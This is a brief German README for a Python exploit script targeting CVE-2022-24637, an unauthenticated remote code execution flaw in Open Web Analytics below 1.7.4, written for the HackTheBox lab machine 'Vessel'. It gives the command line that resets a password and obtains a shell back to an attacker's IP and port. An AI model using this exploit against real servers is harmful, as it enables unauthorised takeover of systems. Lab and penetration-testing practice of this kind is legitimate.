
Unauthentisierte RCE in Open Web Analytics Version <1.7.4
Nicht authentifizierte RCE in Open Web Analytics Version <1.7.4
Dieses Skript wurde erstellt, um die CVE-2022-24637-Sicherheitslücke zu automatisieren. Ich habe diesen Exploit für meine Hackthebox-Maschine vessel erstellt. https://app.hackthebox.com/machines/Vessel
Der Exploit und die Idee basieren auf https://devel0pment.de/?p=2494
Führen Sie das Skript mit den folgenden Parametern aus:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
Möglicherweise müssen Sie es mehrmals ausführen, um eine Shell zu erhalten.
Das Skript kann verbessert werden.
